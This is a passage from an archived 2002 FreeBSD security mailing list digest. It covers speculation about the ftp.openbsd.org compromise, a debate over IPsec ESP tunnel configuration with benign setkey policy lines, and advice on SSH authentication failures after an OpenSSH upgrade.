vested > interest in defaming Open Source systems and software. > > So, who has lately claimed that Open Source is Evil and > Anti-Capitalist? > > Nahh, couldn't be. That would mean bribes and > blackmail. > > Mebbe the problem is that info really isn't Capital at > all, and the bluff might be called. > > Duncan Patton a Campbell is Duibh ;-) > > ---------- Original Message ----------- > From: Holt Grendal > To: security@FreeBSD.ORG > Sent: Thu, 1 Aug 2002 08:46:03 -0700 (PDT) > Subject: How was ftp.openbsd.org compromised? > > > How was ftp.openbsd.org compromised? > > > > Anything we need to worry about? > > > > __________________________________________________ > > Do You Yahoo!? > > Yahoo! Health - Feel better, live better > > http://health.yahoo.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the > > message > ------- End of Original Message ------- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the > message ------- End of Original Message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 14: 4:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1596237B400 for ; Fri, 2 Aug 2002 14:04:18 -0700 (PDT) Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by mx1.FreeBSD.org (Postfix) with SMTP id 4897643E4A for ; Fri, 2 Aug 2002 14:04:17 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net) Received: (qmail 27739 invoked by uid 1001); 2 Aug 2002 21:04:15 -0000 Date: Fri, 2 Aug 2002 17:04:15 -0400 From: "Peter C. Lai" To: Duncan Patton a Campbell is Dhu Cc: Holt Grendal , security@FreeBSD.ORG Subject: Re: How was ftp.openbsd.org compromised? Message-ID: <20020802170415.D19655@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <20020801154603.31872.qmail@web11601.mail.yahoo.com> <20020801180025.M96766@babayaga.neotext.ca> <20020802195310.M1510@babayaga.neotext.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020802195310.M1510@babayaga.neotext.ca>; from campbell@neotext.ca on Fri, Aug 02, 2002 at 01:53:10PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Aug 02, 2002 at 01:53:10PM -0600, Duncan Patton a Campbell is Dhu wrote: > I should think before letting paranoia set in. There's an AI > Hacker's Why are you calling Bioinformaticians "AI hackers"? and please don't group reply since we are so hopelessly off topic here. > convention on in Edmonton... > > Only those who compulsively upgrade their security and don't > check > the checksums could get this. > > Duncan Patton a Campbell is Duibh ;-) -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology Yale University School of Medicine Center for Medical Informatics | SenseLab | Human Brain Project http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 14:48:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9F4F837B400 for ; Fri, 2 Aug 2002 14:48:07 -0700 (PDT) Received: from mail.seton.org (ftp.seton.org [207.193.126.172]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3BA5043E42 for ; Fri, 2 Aug 2002 14:48:07 -0700 (PDT) (envelope-from mgrooms@seton.org) Received: from aus-gwia.aus.dcnhs.org (aus-gwia.aus.dcnhs.org [10.20.10.211]) by mail.seton.org (Postfix) with ESMTP id 99107D003D for ; Fri, 2 Aug 2002 16:48:06 -0500 (CDT) Received: from AUS_SETON-MTA by aus-gwia.aus.dcnhs.org with Novell_GroupWise; Fri, 02 Aug 2002 16:48:06 -0500 Message-Id: X-Mailer: Novell GroupWise Internet Agent 6.0.1 Date: Fri, 02 Aug 2002 16:47:57 -0500 From: "Matthew Grooms" To: Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG toipsec/racoontroubles, help please ...] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hey there, >But why? Is there something this configuration buys >you that you don't >get when all are "vanilla" ESP tunnels? I understand this is not neccesary. The first time I set up ipsec on freebsd I thought it was mandatory out of ignorance. After all there are quite a few how-to's that refect this sort of configuration ... http://www.x-itec.de/projects/tuts/ipsec-howto.txt http://www.daemonnews.org/200101/ipsec-howto.html This one makes an attempt at explaining why it is beneficial. Im not too sure if it is an entirely compeling argument. http://asherah.dyndns.org/~josh/ipsec-howto.txt In any case, I was attempting to help out by answering a peers question to the best of my ability. I was not endorsing one method or another. Note that both were illustrated in the example I posted. >> spdadd 10.22.200.0/24 10.1.2.0/24 any -P out ipsec >> esp/tunnel/10.22.200.1-10.1.2.1/require; >> spdadd 10.1.2.0/24 10.22.200.0/24 any -P in ipsec >> esp/tunnel/10.1.2.1-10.22.200.1/require; >You seem to be doing this backwards from the usual >way (or what I >think of as the usual way)... and I really do not >understand why. You >are taking traffic from, >... Its only backwards if you are used to implimenting IPSEC communications in a non-giff'd confguration. As mentioned before, this is endorsed by many how-to's available. If you don't like this method, don't use it. I for one prefer the giffed alternative but will be more than happy to admit that the benifits appear to be mostly cosmetic. -Matthew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 15:59: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EF7B937B400 for ; Fri, 2 Aug 2002 15:59:05 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9577843E70 for ; Fri, 2 Aug 2002 15:59:04 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.11.6/8.11.0) with ESMTP id g72MxYi03195; Fri, 2 Aug 2002 16:59:34 -0600 (MDT) (envelope-from campbell@babayaga.neotext.ca) From: "Duncan Patton a Campbell is Dhu" To: "Matthew Grooms" , Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG toipsec/racoontroubles, help please ...] Date: Fri, 2 Aug 2002 16:59:34 -0600 Message-Id: <20020802225934.M20274@babayaga.neotext.ca> In-Reply-To: References: X-Mailer: Open WebMail 1.70 20020712 X-OriginatingIP: 127.0.0.1 (campbell) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I made the same mistake. Well, hard to call it a mistake, since it worked, but it did make things more complicated. Duncan Patton a Campbell is Duibh ;-) ---------- Original Message ----------- From: "Matthew Grooms" To: Sent: Fri, 02 Aug 2002 16:47:57 -0500 Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG toipsec/racoontroubles, help please ...] > Hey there, > > >But why? Is there something this configuration buys >you that you don't > >get when all are "vanilla" ESP tunnels? > > I understand this is not neccesary. The first > time I set up ipsec on freebsd I thought it was > mandatory out of ignorance. After all there are quite > a few how-to's that refect this sort of configuration ... > > http://www.x-itec.de/projects/tuts/ipsec-howto.txt > http://www.daemonnews.org/200101/ipsec-howto.html > > This one makes an attempt at explaining why it is > beneficial. Im not too sure if it is an entirely > compeling argument. > > http://asherah.dyndns.org/~josh/ipsec-howto.txt > > In any case, I was attempting to help out by answering > a peers question to the best of my ability. I was not > endorsing one method or another. Note that both were > illustrated in the example I posted. > > >> spdadd 10.22.200.0/24 10.1.2.0/24 any -P out ipsec > >> esp/tunnel/10.22.200.1-10.1.2.1/require; > >> spdadd 10.1.2.0/24 10.22.200.0/24 any -P in ipsec > >> esp/tunnel/10.1.2.1-10.22.200.1/require; > > >You seem to be doing this backwards from the usual >way (or what I > >think of as the usual way)... and I really do not >understand why. You > >are taking traffic from, > >... > > Its only backwards if you are used to implimenting > IPSEC communications in a non-giff'd confguration. As > mentioned before, this is endorsed by many how-to's > available. If you don't like this method, don't use > it. I for one prefer the giffed alternative but will > be more than happy to admit that the benifits appear > to be mostly cosmetic. > > -Matthew > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the > message ------- End of Original Message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 17:20:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B383237B400 for ; Fri, 2 Aug 2002 17:20:36 -0700 (PDT) Received: from hotmail.com (f266.law7.hotmail.com [216.33.236.144]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7EACA43E65 for ; Fri, 2 Aug 2002 17:20:36 -0700 (PDT) (envelope-from striker_d@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Fri, 2 Aug 2002 17:20:36 -0700 Received: from 199.201.236.2 by lw7fd.law7.hotmail.msn.com with HTTP; Sat, 03 Aug 2002 00:20:36 GMT X-Originating-IP: [199.201.236.2] From: "Brad Davis" To: freebsd-security@freebsd.org Subject: SSH upgrade? Date: Fri, 02 Aug 2002 18:20:36 -0600 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 03 Aug 2002 00:20:36.0494 (UTC) FILETIME=[96CD02E0:01C23A83] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, I just upgraded a machine from 4.5-RELEASE to 4.6-STABLE and included in the upgrade was to OpenSSH 3.4p1. Since then I have not been able to ssh from this box out to the world. I get an error that Host authentication failed. It does work from the root account but not from my user account so I deleted ~/.ssh and that hasn't helped either. Any ideas? Thanks, Brad _________________________________________________________________ Send and receive Hotmail on your mobile device: http://mobile.msn.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 21:10:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4A3CD37B400 for ; Fri, 2 Aug 2002 21:10:27 -0700 (PDT) Received: from pintail.mail.pas.earthlink.net (pintail.mail.pas.earthlink.net [207.217.120.122]) by mx1.FreeBSD.org (Postfix) with ESMTP id 00FC643E4A for ; Fri, 2 Aug 2002 21:10:27 -0700 (PDT) (envelope-from geminidomino@earthlink.net) Received: from user168.net314.fl.sprint-hsd.net ([207.30.169.168] helo=thorr) by pintail.mail.pas.earthlink.net with smtp (Exim 3.33 #1) id 17aqFD-00079R-00; Fri, 02 Aug 2002 21:10:24 -0700 Message-ID: <003101c23aa3$b372a330$0100a8c0@asgardnet.org> From: "Ciro Maeitta" To: "Brad Davis" , References: Subject: Re: SSH upgrade? Date: Sat, 3 Aug 2002 00:10:27 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I had this same issue on a Linux box with the same version. I dont quite remember, but I think it had something to do with the host keys... you might want to have a look at sshd_config to make sure everything is 5x5 there. HTH -C ----- Original Message ----- From: "Brad Davis" To: Sent: Friday, August 02, 2002 2020h Subject: SSH upgrade? > Hello, > > I just upgraded a machine from 4.5-RELEASE to 4.6-STABLE and included in the > upgrade was to OpenSSH 3.4p1. Since then I have not been able to ssh from > this box out to the world. I get an error that Host authentication failed. > It does work from the root account but not from my user account so I deleted > ~/.ssh and that hasn't helped either. Any ideas? > > > Thanks, > Brad > > > > _________________________________________________________________ > Send and receive Hotmail on your mobile device: http://mobile.msn.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 22:22:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 980E237B400 for ; Fri, 2 Aug 2002 22:22:15 -0700 (PDT) Received: from mail.crypton.pl (ns.crypton.pl [195.216.109.11]) by mx1.FreeBSD.org (Postfix) with SMTP id 561C843E42 for ; Fri, 2 Aug 2002 22:22:14 -0700 (PDT) (envelope-from mailman@mail.crypton.pl) Received: (qmail 13477 invoked by uid 1002); 3 Aug 2002 05:22:12 -0000 Date: Sat, 3 Aug 2002 07:22:12 +0200 From: =?iso-8859-2?Q?Maciej_Wi=B6niewski?= To: Trish Lynch Cc: freebsd-security@FreeBSD.org Subject: Re: [Q] FreeBSD IPSec Discussion. Message-ID: <20020803072211.A13088@killer.crypton.pl> References: <20020802093902.K497-100000@femme.sapphite.org> <20020802131910.E6519-100000@femme.sapphite.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020802131910.E6519-100000@femme.sapphite.org>; from trish@bsdunix.net on Fri, Aug 02, 2002 at 01:21:35PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello I have one question: why you use gif interface while esp doing all job for you without any additional gif interfaces ??? I have some network of gateways tunneling IP packets via IPSec and it's pretty stable to. And I don't use any gifs or other extra toys: just clean IPSec configuration. Maybe it's something about which I should know ? Regards Nomad On Fri, Aug 02, 2002 at 01:21:35PM -0400, Trish Lynch wrote: > > Lots of people have requested that I document this info somewhere, and I > will do so, probably this Sunday, when I have a little free time to > myself. > > I *do* use the gif interface., and I have some pretty stable tunnels, > again, YMMV. > > I've even gotten it to run with interfaces that have packets diverted > through natd :) > > -Trish > > > > > On Fri, 2 Aug 2002, Trish Lynch wrote: > > > > > No, its so complicated that nobody has the answers :) > > > > Here or -questions would most likely be the best place. I just recently > > learned a hell of a lot about KAME/racoon by trial and error over the past > > couple weeks, including interop issues between other vendor's > > software/hardware. (specifically Ravlins), so If I can help, I'll attempt > > to. > > > > -Trish > > > > > > -- > > Trish Lynch trish@bsdunix.net > > FreeBSD The Power to Serve > > Ecartis Core Team trish@listmistress.org > > http://www.freebsd.org > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > -- > Trish Lynch trish@bsdunix.net > FreeBSD The Power to Serve > Ecartis Core Team trish@listmistress.org > http://www.freebsd.org > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 3 13:43:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0F8E137B400 for ; Sat, 3 Aug 2002 13:43:35 -0700 (PDT) Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id B30A543E65 for ; Sat, 3 Aug 2002 13:43:33 -0700 (PDT) (envelope-from anderson@centtech.com) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g73KhL916822; Sat, 3 Aug 2002 15:43:21 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g73KhLr15900; Sat, 3 Aug 2002 15:43:21 -0500 (CDT) Received: from centtech.com (andersonpc [192.168.42.18]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g73KhIo15827; Sat, 3 Aug 2002 15:43:18 -0500 (CDT) Message-ID: <3D4C40F7.6D87D239@centtech.com> Date: Sat, 03 Aug 2002 15:45:43 -0500 From: Eric Anderson X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.3-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brad Davis Cc: freebsd-security@freebsd.org Subject: Re: SSH upgrade? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Try ssh -v, and see exactly what it is complaining about. Eric Brad Davis wrote: > Hello, > > I just upgraded a machine from 4.5-RELEASE to 4.6-STABLE and included in the > upgrade was to OpenSSH 3.4p1. Since then I have not been able to ssh from > this box out to the world. I get an error that Host authentication failed. > It does work from the root account but not from my user account so I deleted > ~/.ssh and that hasn't helped either. Any ideas? > > Thanks, > Brad > > _________________________________________________________________ > Send and receive Hotmail on your mobile device: http://mobile.msn.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 3 15:58:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B49E837B400 for ; Sat, 3 Aug 2002 15:58:49 -0700 (PDT) Received: from spitfire.velocet.net (spitfire.velocet.net [216.138.223.227]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2B15D43E6E for ; Sat, 3 Aug 2002 15:58:49 -0700 (PDT) (envelope-from steve@nomad.tor.lets.net) Received: from nomad.tor.lets.net (H74.C220.tor.velocet.net [216.138.220.74]) by spitfire.velocet.net (Postfix) with SMTP id 9D3F2FB46D2 for ; Sat, 3 Aug 2002 18:58:47 -0400 (EDT) Received: (qmail 83730 invoked by uid 1001); 3 Aug 2002 22:53:33 -0000 Date: Sat, 3 Aug 2002 18:53:33 -0400 From: Steve Shorter To: Eric Anderson Cc: Brad Davis , freebsd-security@freebsd.org Subject: Re: SSH upgrade? Message-ID: <20020803185333.A83725@nomad.lets.net> References: <3D4C40F7.6D87D239@centtech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3D4C40F7.6D87D239@centtech.com>; from anderson@centtech.com on Sat, Aug 03, 2002 at 03:45:43PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Aug 03, 2002 at 03:45:43PM -0500, Eric Anderson wrote: > Try ssh -v, and see exactly what it is complaining about. > > Eric > > > Brad Davis wrote: > > > Hello, > > > > I just upgraded a machine from 4.5-RELEASE to 4.6-STABLE and included in the > > upgrade was to OpenSSH 3.4p1. Since then I have not been able to ssh from > > this box out to the world. I get an error that Host authentication failed. > > It does work from the root account but not from my user account so I deleted > > ~/.ssh and that hasn't helped either. Any ideas? I believe the default order of authentication techniques has changed. The man page gives full details. If you want to use the same authentication then you must explicitly configure it in ssh_config. -steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message